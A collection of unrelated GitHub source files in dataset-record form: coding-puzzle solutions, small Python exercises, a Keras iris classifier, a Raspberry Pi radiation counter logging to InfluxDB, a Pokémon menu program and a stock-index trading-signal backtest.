as op\nfrom operator import ge, sub, mul\n\n# Boundary case as fact to add\nk.factorial[0, 1] # fatorial(0) == 1\n\n# Recurive rule (can use list/tuple as RHS)\nk.factorial[x, y] = [\n x >= 0, # let x >= 0, otherwise non-termination while exhausting\n k.factorial(x - 1, z), # let z == factorial(x - 1)\n y == x * z # let y == x * z\n]\n\n# Query results\nr = q.factorial(4, '$w')\nprint(list(r))\n# [{$w: 24}]\n\n\nfrom pryo import TermCnpd\n\n# Declare compound data type\nCons = lambda car, cdr: TermCnpd('Cons', car, cdr)\nNIL = None\n\nxs, ys, zs = scm('xs ys zs'.split())\n\nk.append[NIL, ys, ys]\nk.append[Cons(x, xs), ys, Cons(x, zs)] = k.append(xs, ys, zs)\n# This tricky equation above is short for:\n# k.append[Cons(x, xs), ys, zs] <= [\n# k.append(xs, ys, zs),\n# zs == Cons(x, zs)\n# ]\n\n\nr = q.append(NIL, Cons(3, NIL), '$vs')\npprint(list(r))\n# [{$vs: Cons(3, 'NIL')}]\n\nr = q.append(Cons(1, NIL), Cons(3, NIL), '$vs')\npprint(list(r))\n# [{$vs: Cons(1, Cons(3, 'NIL'))}]\n\nr = q.append(Cons(1, Cons(2, NIL)), Cons(3, Cons(4, NIL)), '$vs')\npprint(list(r))\n# [{$vs: Cons(1, Cons(2, Cons(3, Cons(4, 'NIL'))))}]\n","repo_name":"xye7ei/pryo","sub_path":"examples/use.py","file_name":"use.py","file_ext":"py","file_size_in_byte":3473,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"74794562825","text":"class Solution:\r\n def maxProfit(self, prices: List[int]) -> int:\r\n dp = [float('inf')] * len(prices)\r\n \r\n ans = 0\r\n for i in 
range(len(prices)):\r\n dp[i] = min(dp[i-1], prices[i])\r\n ans = max(ans, prices[i] - dp[i])\r\n \r\n return ans","repo_name":"novayo/LeetCode","sub_path":"0121_Best_Time_to_Buy_and_Sell_Stock/try_3.py","file_name":"try_3.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"81"} +{"seq_id":"42436236971","text":"\"\"\"\n Exception\n\"\"\"\n\nimport sys\n\nprint(sys.platform)\ndef is_it_linux():\n assert('linux' in sys.platform), \"fungsi ini hanya untuk linux\"\nis_it_linux()\n\nname = \"budi\"\n\ntry:\n print(i + name)\nexcept : #except NameError:\n print(\"ada yg salah dari i + name\")\n\nraise Exception(\"stop ada yg salah\")#menghentikan program\n\nprint(i+ objek)","repo_name":"dzikrinasa/Automation","sub_path":"Belajar Python/learn4.py","file_name":"learn4.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"25550394297","text":"from collections import defaultdict\nimport graphviz as gv\nimport networkx as nx\nimport matplotlib.pyplot as plt\n\nclass Graph:\n def __init__(self, nodes):\n self.V = nodes\n self.graph = defaultdict(list)\n self.Time = 0\n\n def addEdge(self,u,v): \n self.graph[u].append(v) \n self.graph[v].append(u)\n\n def degre(self, v):\n return self.graph[v]\n\n def APUtil(self,u, visited, ap, parent, low, disc): \n \n children =0\n visited[u]= True\n disc[u] = self.Time \n low[u] = self.Time \n self.Time += 1\n \n for v in self.graph[u]: \n if visited[v] == False : \n parent[v] = u \n children += 1\n\n self.APUtil(v, visited, ap, parent, low, disc) \n low[u] = min(low[u], low[v]) \n if parent[u] == -1 and children > 1: \n ap[u] = True\n \n if parent[u] != -1 and low[v] >= disc[u]: \n ap[u] = True \n \n elif v != parent[u]: \n low[u] = min(low[u], disc[v]) \n \n def AP(self): \n points = list()\n visited = [False] * (self.V) \n disc = [float(\"Inf\")] * (self.V) \n low = [float(\"Inf\")] * (self.V) \n parent = [-1] * (self.V) \n ap = [False] * (self.V) \n for i in range(self.V ): \n if visited[i] == False: \n self.APUtil(i, visited, ap, parent, low, disc) \n for index, value in enumerate (ap): \n if value == True: points.append(index)\n return points\n\n def Remove_articualtion_point(self, point):\n del self.graph[point]\n for i in self.graph: \n if point in self.graph[i] : self.graph[i].remove(point)\n \n def PrintGraph(self):\n for i in self.graph : print(i,self.graph[i])\n \n def DrawGraph(self):\n G = nx.Graph()\n for i in self.graph:\n G.add_node(i)\n for i in self.graph: \n for j in self.graph[i]:\n G.add_edge(j, i)\n \n \n nx.draw(G, with_labels=True, font_weight='bold')\n plt.figure(100)\n #plt.show()\n #plt.cla()\n #plt.cla()\n \n def Color(self):\n G = nx.Graph()\n for i in self.graph:\n G.add_node(i)\n for i in self.graph: \n for j in self.graph[i]:\n G.add_edge(j, i)\n \n pos = nx.spring_layout(G, seed=3113794652) # positions for all nodes\n # nodes\n options = {\"edgecolors\": \"tab:gray\", \"node_size\": 800, \"alpha\": 0.9}\n nx.draw_networkx_nodes(G, pos, nodelist=list(G.nodes), node_color=\"tab:blue\", **options)\n nx.draw_networkx_nodes(G, pos, nodelist=self.AP(), node_color=\"tab:red\", **options)\n nx.draw_networkx_edges(G, pos, width=1.0, alpha=0.5)\n \n nx.draw_networkx_edges(\n G,\n pos,\n edgelist=list(G.edges),\n width=3,\n alpha=0.5,\n edge_color=\"tab:blue\",\n )\n\n\n plt.tight_layout()\n plt.axis(\"off\")\n plt.figure(200)\n #plt.cla()\n \n\n\ng3 = Graph 
(7) \ng3.addEdge(0, 1) \ng3.addEdge(1, 2) \ng3.addEdge(2, 0) \ng3.addEdge(1, 3) \ng3.addEdge(1, 4) \ng3.addEdge(1, 6) \ng3.addEdge(3, 5) \ng3.addEdge(4, 5) \n\n\n\"\"\"\ng3.PrintGraph()\ng3.DrawGraph()\ng3.Color()\n\"\"\"\nprint (\"Articulation points in third graph \")\nprint(g3.AP()) \n","repo_name":"Nawfel1449/Articulation-points-in-graph","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"39301445647","text":"# code extracted from https://github.com/classner/pymp\n\nfrom __future__ import print_function\n\nimport pymp\n \nex_array = pymp.shared.array((100,), dtype='uint8')\nwith pymp.Parallel(4) as p:\n for index in p.range(0, 100):\n ex_array[index] = 1\n # The parallel print function takes care of asynchronous output.\n p.print('Yay! {} done!'.format(index))","repo_name":"besser/pymp-test","sub_path":"test_with_pymp.py","file_name":"test_with_pymp.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"3757980512","text":"def part1(input):\n with open(input) as f:\n lines = f.readlines()\n lines = [s.strip() for s in lines]\n\n x = 1\n signalStrengths = []\n\n cycle = 1\n for line in lines:\n val = 0\n if line != \"noop\":\n val = int(line.split()[1])\n signalStrengths.append(cycle*x)\n cycle +=1\n signalStrengths.append(cycle*x)\n x += val\n cycle += 1\n \n part1 = signalStrengths[19] + signalStrengths[59] + signalStrengths[99] + signalStrengths[139] + signalStrengths[179] + signalStrengths[219]\n print(\"part1: \" + str(part1))\n \ndef writeToCrt(pos, sprite):\n if pos in sprite:\n return \"#\"\n else:\n return \".\"\n\ndef part2(input):\n with open(input) as f:\n lines = f.readlines()\n lines = [s.strip() for s in lines]\n\n sprite = (0, 1, 2)\n val = 1\n crtOutput = \"\"\n\n position = 0\n for line in lines:\n position = position % 40\n val = 0\n if line != \"noop\":\n val = int(line.split()[1])\n crtOutput += writeToCrt(position, sprite)\n position = (position + 1) % 40\n crtOutput += writeToCrt(position, sprite)\n sprite = (sprite[0]+val, sprite[1]+val, sprite[2]+val)\n position += 1\n \n print(\"part2:\")\n for i in range(0, 201, 40):\n print(crtOutput[i:i+40])\n \npart1('Day10/input/input.txt')\npart2('Day10/input/input.txt')","repo_name":"henkj/Advent-of-Code-2022","sub_path":"Day10/Day10.py","file_name":"Day10.py","file_ext":"py","file_size_in_byte":1564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"25030288084","text":"di = [0, 0, 1, -1] # 오른쪽, 왼쪽, 아래, 위 #여기서 위는 필요없음\ndj = [1, -1, 0, 0]\nladder = [] # 함수에서 사용될 ladder선언\n\n\ndef check(i, j, dir):\n if ladder[i][j] == 2:\n return True # 종료이면 True...본문에서 조건식으로 시작지점 나오게함\n elif i == 99:\n return False\n else:\n if (dir == 0) or (dir == 1):\n ni, nj = i + di[dir], j + dj[dir]\n if ni >= 0 and ni < 100 and nj >= 0 and nj < 100 and ladder[ni][nj] == 1:\n return check(ni, nj, dir)\n else: # 못갔어, 그러면 아래로(dir=2) 내려감!!!!\n return check(i + 1, j, 2)\n else: # 애초에 아래로 내려가는 중...dir=2\n for d in range(2): # d가 dir\n ni, nj = i + di[d], j + dj[d]\n if ni >= 0 and ni < 100 and nj >= 0 and nj < 100 and ladder[ni][nj] == 1:\n return check(ni, nj, d)\n return check(i + 1, j, 2) # 아래로 내려가!!!!!!!\nfor tc in range(1, 11):\n T = int(input())\n ladder = [list(map(int, input().split())) for _ in range(100)]\n start = []\n for j in range(100):\n 
if ladder[0][j] == 1:\n start.append(j)\n for s in start:\n if check(0, s, 2):\n print('#{} {}'.format(tc, s))\n break # 답을 찾았기 떄문에 나가줌!!!!","repo_name":"parkbum11/Algorithm","sub_path":"SWEA/LEARN/ProgrammingAdvanced/practice.py","file_name":"practice.py","file_ext":"py","file_size_in_byte":1390,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"71713924105","text":"from ejercicio1 import *\nfrom ejercicio2 import *\nfrom ejercicio3 import *\nimport time\n\nimport csv \nimport numpy as np\nwith open('/Users/hectorbernaltrujillo/Documents/informática/Programación python/ff/evaluacion_tema4/pokemon.csv', 'r') as f:\n reader = csv.reader(f)\n lista = list(reader)\n\n#CREAMOS UNA LISTA CON LOS NOMBRES:\nnombres= []\nfor i in range(1, len(lista)): \n nombres.append(lista[i][1]) #Cogemos la columna 1 que es la de los nombres\n\n#CREAMOS UNA LISTA CON LOS NUMEROS:\nnumeros= []\nfor i in range(1, len(lista)): \n numeros.append(lista[i][0]) #Cogemos la columna 0 que es la de los numeros\n\n#CREAMOS UNA LISTA CON LAS DEBILIDADES:\ntipos= []\nfor i in range(1, len(lista)): \n tipos.append(lista[i][2]) #Cogemos la columna 2 que es los tipos\n\nraiz = None\nfor i in range(len(nombres)):\n raiz = insertar_nodo(raiz, nombres[i])\n\n#NUMEROS:\nraiz2 = None\nfor i in range(len(numeros)):\n raiz2 = insertar_nodo(raiz2, numeros[i])\n\n#TIPOS:\nraiz3 = None\nfor i in range(len(tipos)):\n raiz3 = insertar_nodo(raiz3, tipos[i])\n\n\ndef iniciar():\n\n while True:\n\n print('----------------------------------------')\n print('-----------------MENU-------------------')\n print('----------------------------------------')\n print('[1] Ejercicio 1: Codificar y decodificar')\n print('[2] Ejercicio 2: Pokemons')\n print('[3] Ejercicio 3: Las 7 Maravillas')\n print('[4] Ejercicio 4: salir del programa')\n print('----------------------------------------')\n\n opcion = input('Introduce una opcion: ')\n\n if opcion == '1':\n print('.....Cargando.....')\n time.sleep(2)\n simbolos= ['A', 'F', '1', '3', 'O', 'M', 'T']\n frecuencias= [0.2, 0.17, 0.13, 0.21, 0.05, 0.09, 0.15]\n raiz= arbol_huffman(simbolos, frecuencias)\n print('\\nObtenemos los siguientes códigos por cada símbolo:')\n print('A: ', codificar('A', raiz))\n print('F: ', codificar('F', raiz))\n print('1: ', codificar('1', raiz))\n print('3: ', codificar('3', raiz))\n print('0: ', codificar('0', raiz)) #TODO: Falla al codificar el 0 \n print('M: ', codificar('M', raiz))\n print('T: ', codificar('T', raiz))\n\n while True:\n print('¿Quieres codificar algun mensaje? 
(SI/NO)')\n respuesta= input()\n if respuesta.upper()== 'SI':\n print('tabla de simbolos: ', simbolos)\n print('Introduce el mensaje a codificar: ')\n mensaje= input()\n print('Mensaje codificado: ', codificar(mensaje, raiz))\n print('Mensaje decodificado: ', decodificar(codificar(mensaje, raiz), raiz))\n elif respuesta.upper()== 'NO':\n print('....Volviendo al menu....')\n break\n else:\n print('Introduce SI o NO')\n\n\n \n elif opcion == '2':\n \n print('.....Cargando.....')\n time.sleep(2)\n while True:\n print('[1] Buscar pokemos por nombre o por proximidad')\n print('[2] Buscar pokemons por tipo (Fuego, Agua, Planta y Eléctrico)')\n print('[3] Mostrar listado por nombre en forma ascendente') \n print('[4] Mostrar listado por número en forma ascendente')\n print('[5] Mostrar los Pokemos que son debiles a (Jolteon, Lycanroc y Tyrantrum)')\n print('[6] Mostrar todos los tipos de pokemos y la cantidad de pokemos que hay de cada tipo')\n print('[7] Listado de nombres por nivel')\n print('[8] Nada')\n\n opcion = input('Introduce una opcion: ')\n\n if opcion == '1':\n for i in [3,2,1]:\n time.sleep(i)\n print(f'.....Cargando en {i}.....')\n print('Introduce el nombre del pokemon que quieres buscar: ')\n nombre = input()\n proximidad_nombres(nombre, nombres)\n\n elif opcion == '2':\n for i in [3,2,1]:\n time.sleep(i)\n print(f'.....Cargando en {i}.....')\n print('Introduce el tipo de pokemon que quieres buscar: ')\n tipo = input()\n mostrar_pokemon_tipo(tipo, tipos)\n\n elif opcion == '3':\n for i in [3,2,1]:\n time.sleep(i)\n print(f'.....Cargando en {i}.....')\n print('Listado de pokemos por nombre: ')\n inorden(raiz)\n \n elif opcion == '4':\n for i in [3,2,1]:\n time.sleep(i)\n print(f'.....Cargando en {i}.....')\n print('Listado de pokemos por numero: ')\n inorden(numeros)\n\n elif opcion == '5':\n for i in [3,2,1]:\n time.sleep(i)\n print(f'.....Cargando en {i}.....')\n print('Los pokemos que son debiles a Jolteon, Lycanroc y Tyrantrum son: ')\n debil('Jolteon', 'Lycanroc', 'Tyrantrum')\n\n elif opcion == '6':\n for i in [3,2,1]:\n time.sleep(i)\n print(f'.....Cargando en {i}.....')\n unicos = {}\n unicos = valores_unicos(raiz3, unicos)\n print('Hay', len(unicos), 'pokemons diferentes')\n\n elif opcion == '7':\n for i in [3,2,1]:\n time.sleep(i)\n print(f'.....Cargando en {i}.....')\n por_nivel(raiz)\n\n elif opcion == '8':\n break\n\n else:\n print('Opcion no valida')\n\n elif opcion == '3':\n grafo = Grafo()\n grafo = crear_grafo(grafo)\n print(\"El grafo creado es: \")\n print(grafo)\n print(\"El arbol de expansión minima de las maravillas arquitectónicas es: \")\n print(kruskal(grafo, \"Arquitectonica\"))\n print(\"El arbol de expansión minima de las maravillas naturales es: \")\n print(kruskal(grafo, \"Natural\"))\n print(\"Los paises que tienen maravillas arquitectónicas y naturales son: \")\n print(pais_con_maravilla_arquitectonica_y_natural(grafo))\n\n elif opcion == '4':\n print('Gracias por usar el programa')\n break\n\n else:\n print('Opcion no valida')\n\nif __name__ == '__main__':\n iniciar()\n\n\n\n\n\n\n \n\n\n\n\n\n\n\n\n","repo_name":"albabernal03/evaluacion_tema4","sub_path":"Tema4/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":6919,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"1813998388","text":"import pandas as pd\nimport numpy as np\ndataset=pd.read_csv('iris.csv')\nX=dataset.iloc[:,0:4].values\nY=dataset.iloc[:,4].values\n\n#output lebel dummy create\nfrom keras.utils import 
np_utils\nfrom sklearn.preprocessing import LabelEncoder,OneHotEncoder\nlabelencoder=LabelEncoder()\nlabelencoder.fit(Y)\nY = labelencoder.transform(Y)\nY = np_utils.to_categorical(Y)\n\n#training and testing split\nfrom sklearn.model_selection import train_test_split\nX_train,X_test,Y_train,Y_test =train_test_split(X,Y,test_size=0.2,random_state=0)# test size is a percent of whole dataset here test size is 20%\n\n# Feature Scaling\nfrom sklearn.preprocessing import StandardScaler\nsc = StandardScaler()\nX_train = sc.fit_transform(X_train)\nX_test = sc.transform(X_test)\nimport keras\nfrom keras.models import Sequential\nfrom keras.layers import Dense\n\nmodel=Sequential()\nmodel.add(Dense(output_dim=4,activation='relu',input_dim=4))\nmodel.add(Dense(output_dim=4,activation='relu'))\nmodel.add(Dense(output_dim=3,activation='sigmoid'))\nmodel.compile(optimizer='adam',loss='categorical_crossentropy',metrics=['accuracy'])\nmodel.fit(X_train,Y_train,batch_size=10, nb_epoch = 100)\ny_pred= model.predict(X_test)\ny_pred= (y_pred>=0.5)\nprediction = [[str(0) for i in range(1)] for j in range(len(y_pred))]#2D array \nfor i in range(0,len(y_pred)):\n s=y_pred[i]\n if(str(s[0])==\"True\"):\n prediction[i][0]=\"Iris-Setosa\"\n elif(str(s[1])==\"True\"):\n prediction[i][0]=\"Iris-Versicolor\"\n elif(str(s[2])==\"True\"):\n prediction[i][0]=\"Iris-Virginica\"\n else:\n prediction[i][0]=\"Not Matched\"\n","repo_name":"rafi138/Machine-Learning","sub_path":"Iris Class Prediction/iris_plant_class_prediction.py","file_name":"iris_plant_class_prediction.py","file_ext":"py","file_size_in_byte":1582,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"81"} +{"seq_id":"70145780106","text":"\"\"\"\nGiven a binary search tree, write a function to find the kth smallest element in the tree.\n\nExample :\n\nInput :\n 2\n / \\\n1 3\n\nand k = 2\n\nReturn : 2\n\nAs 2 is the second smallest element in the tree.\n NOTE : You may assume 1 <= k <= Total number of nodes in BST\n \"\"\"\n\n # Definition for a binary tree node\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\nfrom collections import deque\n\nclass Solution:\n # @param root : root node of tree\n # @param k : integer\n # @return an integer\n def kthsmallest(self, root, k):\n count = 0\n stack = deque()\n current_element = root\n done = False\n while not done:\n if current_element is not None:\n stack.appendleft(current_element)\n current_element = current_element.left\n else:\n if stack:\n current_element = stack.popleft()\n count += 1\n if count == k:\n return current_element.val\n current_element = current_element.right\n else:\n done = True\n return\n","repo_name":"defaults/competitive-programming","sub_path":"InterviewBit/Trees/kth_smallest_element.py","file_name":"kth_smallest_element.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"34550211625","text":"#\n# By Bill Roth, but I heavily used this as a reference. 
https://github.com/chrisys/background-radiation-monitor/blob/master/counter/counter.py\n#\n\nimport time\nimport RPi.GPIO as GPIO\nimport datetime\nfrom collections import deque\nfrom influxdb_client import InfluxDBClient\n\n\ncounts = deque()\ngPrint = True\nusvh_factor = 1.0/151.0 # this is the factor for the J305, ie number of clicks that indicates 1 microsievert, ie 1 click=1/151 of a microsievert\ngClient = None\ngWriteApi = None\n\ndef countme(channel):\n global counts,gPrint\n timestamp = datetime.datetime.now()\n counts.append(timestamp)\n return\n\ndef setup():\n global gClient,gWriteApi\n\n if gPrint:\n print(\"running setup\")\n GPIO.setmode (GPIO.BOARD)\n GPIO.setup(7, GPIO.IN)\n GPIO.add_event_detect(7, GPIO.FALLING, callback=countme)\n if gPrint:\n print(\"done with setup\")\n gClient = InfluxDBClient(url=\"YOURINFLUXDBIPANDPORT\", token='YOURINFLUXDB2TOKEN', org='YOUORG')\n gWriteApi = gClient.write_api()\n\n return\n\ndef sendDataPoint(p):\n '''send datapoint to the database'''\n global gWriteApi\n gWriteApi.write(\"bucket\", \"org-name\",p)\n\n return\n\ndef main():\n global gPrint\n setup()\n\n loopCount = 0\n while True:\n loopCount += 1\n try:\n while counts[0] < datetime.datetime.now() - datetime.timedelta(seconds=60):\n counts.popleft()\n except IndexError:\n pass # there are no records in the queue.\n\n if loopCount == 10:\n loopCount=0\n microsieverts = len(counts)*usvh_factor\n measurements = [\n {\n 'measurement': 'radiation',\n 'fields': {\n 'cpm': int(len(counts)),\n 'usvh': microsieverts\n }\n }\n ]\n if gPrint:\n print(measurements)\n sendDataPoint(measurements)\n\n time.sleep(1)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"wgroth2/pi-stuff","sub_path":"counter.py","file_name":"counter.py","file_ext":"py","file_size_in_byte":1996,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"74358380106","text":"#https://leetcode.com/problems/01-matrix/solution/\n\nfrom typing import List\n\nclass Solution:\n def updateMatrix(self, matrix: List[List[int]]) -> List[List[int]]:\n m = len(matrix)\n if m == 0:\n return\n n = len(matrix[0])\n\n dist = [[100 for col in range(n)] for row in range(m)]\n\n for i in range(m):\n for j in range(n):\n if matrix[i][j] == 0:\n dist[i][j] = 0\n else:\n dist[i][j] = min(dist[i][j], min(100 if i == 0 else dist[i-1][j], 100 if j == 0 else dist[i][j-1]) + 1)\n\n for i in range(m-1, -1, -1):\n for j in range(n-1, -1, -1):\n if matrix[i][j] == 0:\n dist[i][j] = 0\n else:\n dist[i][j] = min(dist[i][j], min(100 if i == (m - 1) else dist[i+1][j], 100 if j == (n - 1) else dist[i][j+1]) + 1)\n\n return dist\n\n\ns = Solution()\n\nprint(s.updateMatrix([[0,0,0],\n [0,1,0],\n [0,0,0]]))","repo_name":"SergeySatunin/leetcode","sub_path":"dynamic_programming/0_1_matrix.py","file_name":"0_1_matrix.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"11620312595","text":"import rebound\nimport unittest\nimport os\nfrom rebound.interruptible_pool import InterruptiblePool\n \ndef runsim(param):\n sim = rebound.Simulation()\n sim.add(m=1.)\n sim.add(a=param)\n sim.integrate(0.1)\n return sim.particles[1].x\n\nclass TestInterruptiblePool(unittest.TestCase):\n def test_nopool(self):\n pool = InterruptiblePool(2)\n params = [1.,1.1]\n res = [runsim(params[0]), runsim(params[1])]\n self.assertAlmostEqual(res[0],0.9950041652780258,delta=1e-15)\n 
self.assertAlmostEqual(res[1],1.095870355119381,delta=1e-15)\n\n def test_pool(self):\n pool = InterruptiblePool(2)\n params = [1.,1.1]\n res = pool.map(runsim,params)\n self.assertAlmostEqual(res[0],0.9950041652780258,delta=1e-15)\n self.assertAlmostEqual(res[1],1.095870355119381,delta=1e-15)\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"shangfei/rebound-sph","sub_path":"rebound/tests/test_interruble_pool.py","file_name":"test_interruble_pool.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"81"} +{"seq_id":"38806528511","text":"from BarraFactor.barra_factor import *\nfrom AIndustryRotation.FactorTest import *\nfrom BasicTools import *\n\nclass BigAmt(object):\n def __init__(self,start_date = 20150101,end_date = 20201231,ind='SW1',fee=0.001,bench_list=['SZZZ','CYB','wind_A']):\n self.start_date = start_date\n self.end_date = end_date\n self.fee = fee\n self.ind = ind\n # 获取因子和因子值\n date_list = get_date_range(get_pre_trade_date(start_date,900), end_date)\n self.date_list = date_list\n self.bench_list = bench_list\n # --------------------------------------- 指数的基础数据 ------------------------------------------ #\n bench_open = get_daily_1factor('open',date_list=date_list, code_list=bench_list,type='bench')\n bench_high = get_daily_1factor('high', date_list=date_list, code_list=bench_list, type='bench')\n bench_low = get_daily_1factor('low', date_list=date_list, code_list=bench_list, type='bench')\n bench_close = get_daily_1factor('close', date_list=date_list, code_list=bench_list, type='bench')\n bench_amt = get_daily_1factor('amt', date_list=date_list, code_list=bench_list, type='bench')\n\n self.bench_open = bench_open\n self.bench_high = bench_high\n self.bench_low = bench_low\n self.bench_close = bench_close\n self.bench_amt = bench_amt\n\n # --------------------------------------- 行业的基础数据 ------------------------------------------ #\n code_list = get_real_ind(ind[:-1], int(ind[-1]))\n self.ind_list = code_list\n ind_open = get_daily_1factor('open', date_list=date_list, code_list=code_list, type=ind[:-1])\n ind_high = get_daily_1factor('high', date_list=date_list, code_list=code_list, type=ind[:-1])\n ind_low = get_daily_1factor('low', date_list=date_list, code_list=code_list, type=ind[:-1])\n ind_close = get_daily_1factor('close', date_list=date_list, code_list=code_list, type=ind[:-1])\n ind_amt = get_daily_1factor('amt', date_list=date_list, code_list=code_list, type=ind[:-1])\n\n self.ind_open = ind_open\n self.ind_high = ind_high\n self.ind_low = ind_low\n self.ind_close = ind_close\n self.ind_amt = ind_amt\n\n # --------------------------------------- 个股的基础数据 ------------------------------------------ #\n open = get_daily_1factor('open', date_list=date_list)\n high = get_daily_1factor('high', date_list=date_list)\n low = get_daily_1factor('low', date_list=date_list)\n close = get_daily_1factor('close', date_list=date_list)\n amt = get_daily_1factor('amt', date_list=date_list)\n\n self.open = open\n self.high = high\n self.low = low\n self.close = close\n self.amt = amt\n\n # ----------------------------- 构造因子 ------------------------------- #\n def FactorData(self,bench,days=20):\n if bench in bench_name.keys():\n log_amt = np.log(self.bench_amt[bench])\n else:\n log_amt = np.log(self.ind_amt[bench].dropna())\n\n amt_signal = (log_amt - log_amt.rolling(days).mean()) / log_amt.rolling(days).std()\n\n return amt_signal\n\n # ----------------------------- 交易信号:即根据某个阈值信号参与交易 
------------------------- #\n def TradeSignal(self,bench):\n amt_signal20, amt_signal60 = self.FactorData(bench, days=20), self.FactorData(bench, days=60)\n\n signal_mean20, signal_std20 = amt_signal20.rolling(252 * 3).mean(), amt_signal20.rolling(252 * 3).std()\n signal_mean60, signal_std60 = amt_signal60.rolling(252 * 3).mean(), amt_signal60.rolling(252 * 3).std()\n\n buy_signal = (amt_signal20 > signal_mean20 + 1.5 * signal_std20) | (amt_signal60 > signal_mean60 + 1.5 * signal_std60)\n sell_signal = (amt_signal20 < signal_mean20) | (amt_signal60 < signal_mean60)\n\n trade_signal = (buy_signal & (~sell_signal)).loc[get_pre_trade_date(self.start_date,120):self.end_date]\n\n return trade_signal\n\n # ----------------------------- 策略信号:即参与市场交易周期的信号 -------------------------- #\n def StrategySignal(self,bench):\n amt_signal20, amt_signal60 = self.FactorData(bench, days=20), self.FactorData(bench, days=60)\n\n signal_mean20, signal_std20 = amt_signal20.rolling(240 * 3).mean(), amt_signal20.rolling(240 * 3).std()\n signal_mean60, signal_std60 = amt_signal60.rolling(240 * 3).mean(), amt_signal60.rolling(240 * 3).std()\n\n buy_signal = (amt_signal20 > signal_mean20 + 1.5 * signal_std20) | (amt_signal60 > signal_mean60 + 1.5 * signal_std60)\n sell_signal = (amt_signal20 < signal_mean20) | (amt_signal60 < signal_mean60)\n\n strategy_signal = buy_signal * 1 + sell_signal * -1\n strategy_signal = strategy_signal.replace(0, np.nan).ffill().fillna(0).loc[self.start_date:self.end_date]\n\n return strategy_signal\n\n # ----------------------------- 最终信号测试和信号汇总 --------------------------------- #\n def AllResult(self, bench, factor_days=20, trade_time='open', future_days=10, strategy='first'):\n if bench in bench_name.keys():\n price = self.bench_open[bench] if trade_time=='open' else self.bench_close[bench]\n else:\n price = self.ind_open[bench] if trade_time == 'open' else self.ind_close[bench]\n # 1、因子值 及 因子值的测试结果\n amt_signal = self.FactorData(bench,days=factor_days)\n data_result, group_num, group_pct = GroupTest(amt_signal, price, future_days=10, rol_days=252 * 3, group='std')\n\n # 2、交易信号 及 交易信号的测试结果\n trade_signal = self.TradeSignal(bench)\n trade_list, TradeResult = TradeSignalTest(trade_signal, price, before_days=10, future_days=future_days,trade_strategy=strategy)\n\n # 3、策略信号 及 策略信号的测试结果\n strategy_signal = self.StrategySignal(bench)\n net_values, StrategyResult = StrategySingalTest(strategy_signal.replace(-1, 0), bench=bench, trade_time=trade_time,buy_way=1)\n\n return amt_signal,data_result, group_num, group_pct, trade_signal, TradeResult, strategy_signal, StrategyResult\n\n # 所有指数/行业的信号综合\n def AllStrategy(self, bench_type = 'bench', trade_time = 'open', future_days = 10):\n if bench_type == 'bench':\n bench_price = self.bench_close.copy() if trade_time == 'close' else self.bench_open.copy()\n elif bench_type == 'SW1':\n bench_price = self.ind_close.copy() if trade_time == 'close' else self.ind_open.copy()\n\n all_trade_signal, all_strategy_signal = pd.DataFrame(), pd.DataFrame()\n trade_test, strategy_test = pd.DataFrame(), pd.DataFrame()\n\n\n for bench in tqdm(bench_price.columns):\n amt_signal, data_result, group_num, group_pct, trade_signal, TradeResult, strategy_signal, StrategyResult = \\\n self.AllResult(bench, factor_days=20, trade_time=trade_time, future_days=future_days, strategy='first')\n\n all_trade_signal = pd.concat([all_trade_signal, trade_signal.rename(bench)], axis=1)\n all_strategy_signal = pd.concat([all_strategy_signal, strategy_signal.rename(bench)], axis=1)\n\n 
trade_test = pd.concat([trade_test, TradeResult.loc['all'].rename(bench)],axis=1)\n strategy_test = pd.concat([strategy_test, StrategyResult['all'].rename(bench)],axis=1)\n\n return all_trade_signal, all_strategy_signal, trade_test, strategy_test\n\n\nif __name__ == '__main__':\n # ------------------------------- 测试使用 ------------------------------ #\n ind, start_date, end_date = 'SW1', get_recent_trade_date(20171231), get_recent_trade_date()\n self = BigAmt(start_date, end_date, ind, fee=0.001)\n bench,factor_days = 'CYB', 20\n trade_time, future_days = 'open', 10\n # 1、 测试单因子有效性:如果计划测试因子及参数有效性,则使用下面代码:考察其分组收益,和是否有偏\n amt_signal, data_result, group_num, group_pct, trade_signal, TradeResult, strategy_signal, StrategyResult = \\\n self.AllResult(bench, factor_days=factor_days, trade_time=trade_time, future_days=future_days, strategy='first')\n\n print('偏度和IC:\\n',data_result.astype(float).round(4))\n print('收益率分布:\\n', group_pct.astype(float).round(4))\n # 如果分组良好,偏度良好,那么就开始进行交易信号和策略信号的测试\n print('交易信号输出结果:\\n',TradeResult.astype(float).round(4))\n print('策略多头结果:\\n', StrategyResult.astype(float).round(4))\n\n\n # ---------------------------- 计划运行使用 ---------------------------------- #\n ind, start_date, end_date = 'SW1', 20151231, get_recent_trade_date()\n trade_by, future_days = 10, 'open'\n self = BigAmt(start_date, end_date, ind, fee=0.001)\n # 